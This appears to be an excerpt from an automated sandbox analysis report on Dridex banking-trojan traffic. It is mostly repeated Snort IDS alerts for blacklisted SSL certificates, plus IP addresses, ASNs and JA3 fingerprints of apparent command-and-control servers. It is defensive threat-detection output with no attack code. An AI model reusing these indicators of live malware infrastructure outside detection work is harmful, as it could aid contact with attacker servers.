    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49254
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49255
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49258
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49259
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49260
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49260
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49262
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49263
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49264
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49264
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49266
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49267
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49268
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49268
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49270
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49271
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49272
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49272
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49274
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49275
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49276
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49276
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49278
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49279
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49280
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49280
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49282
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49283
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49284
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49284
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49286
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49287
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49288
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49288
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49290
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49291
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49292
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49292
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49294
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49295
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49296
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49296
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49298
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49299
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49300
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49300
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49302
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49303
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49304
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49304
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49306
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49307
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49308
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49308
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49310
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49311
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49312
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49312
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49314
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49315
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49316
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49316
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49318
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49319
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49320
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49320
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49322
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49323
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49324
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49324
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49326
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49327
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49328
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49328
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49330
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49331
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49332
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49332
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49334
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49335
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49336
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49336
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49338
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49339
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49340
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49340
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49342
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49343
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49344
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49344
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49346
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49347
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49348
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49348
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49350
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49351
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49352
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49352
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49354
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49355
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49356
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49356
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49358
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49359
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49362
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49363
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49366
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49367
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49370
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49371
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49374
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49375
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49378
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49379
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49382
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49383
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49386
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49387
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49390
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49391
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49394
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49395
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49398
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49399
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49402
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49403
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49404
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49404
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49406
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49407
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49408
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49408
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49410
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49411
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49412
    Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49412
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 80.86.91.27:3308
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.100.228.233:3389
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 46.105.131.65:1512
    Source: Joe Sandbox ViewIP Address: 5.100.228.233 5.100.228.233
    Source: Joe Sandbox ViewIP Address: 80.86.91.27 80.86.91.27
    Source: Joe Sandbox ViewIP Address: 46.105.131.65 46.105.131.65
    Source: Joe Sandbox ViewIP Address: 77.220.64.37 77.220.64.37
    Source: Joe Sandbox ViewASN Name: SENTIANL SENTIANL
    Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
    Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
